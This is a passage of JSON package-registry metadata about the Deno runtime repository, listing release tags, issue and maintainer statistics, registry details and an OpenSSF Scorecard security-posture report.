o/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T15:41:39.902Z","dependent_packages_count":0,"downloads":3633,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":88.76217778322139,"dependent_repos_count":13.592702189210836,"dependent_packages_count":17.954574040606648,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":40.10315133767963},"purl":"pkg:cargo/fast-registry-json","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/fast-registry-json","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/fast-registry-json","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/fast-registry-json/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/fast-registry-json/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2026-07-03T14:21:50.110Z","updated_at":"2026-07-03T14:21:50.110Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2026-07-03T14:21:50.204Z","updated_at":"2026-07-03T14:21:50.204Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14146248,"name":"org.mvnpm:deno","ecosystem":"maven","description":"A modern runtime for JavaScript and TypeScript.","homepage":"https://deno.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"org.mvnpm","versions_count":18,"first_release_published_at":"2025-12-18T13:56:52.000Z","latest_release_published_at":"2026-08-29T02:11:53.000Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:54:36.870Z","created_at":"2026-03-29T12:07:55.025Z","updated_at":"2026-09-08T17:32:47.659Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm/deno/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm/deno/","metadata":{},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-09-04T18:13:25.000Z","size":249845,"stargazers_count":108384,"open_issues_count":1549,"forks_count":6373,"subscribers_count":1430,"default_branch":"main","last_synced_at":"2026-09-06T18:12:48.927Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-09-06T18:00:40.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: 